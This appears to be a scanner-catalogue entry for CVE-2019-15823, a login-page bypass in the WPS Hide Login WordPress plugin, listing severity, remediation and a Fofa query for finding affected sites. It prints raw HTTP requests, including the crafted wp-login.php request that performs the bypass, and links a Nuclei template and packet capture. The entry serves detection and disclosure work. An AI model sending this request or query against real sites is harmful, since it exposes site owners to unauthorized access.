| Title | WPS Hide Login <= 1.5.2.2 - Login Page Bypass |
|---|---|
| Author | pussycat0x |
| Severity | High |
| Impact | Attackers can bypass login protection, potentially leading to unauthorized access. |
| Remediation | Update to version 1.5.3 or later. |
| Fofa Query | body="/wp-content/plugins/wps-hide-login" |
| Tags | cve cve2019 wordpress wp-plugin wp disclosure wps-hide-login vuln |
WPS-Hide-Login plugin before 1.5.3 for WordPress contains an action=confirmaction protection bypass, letting attackers bypass security checks, exploit requires sending crafted requests.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /wp-login.php?SECUPRESSaction=confirmaction HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-15823.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-15823.pcap
N/AN/A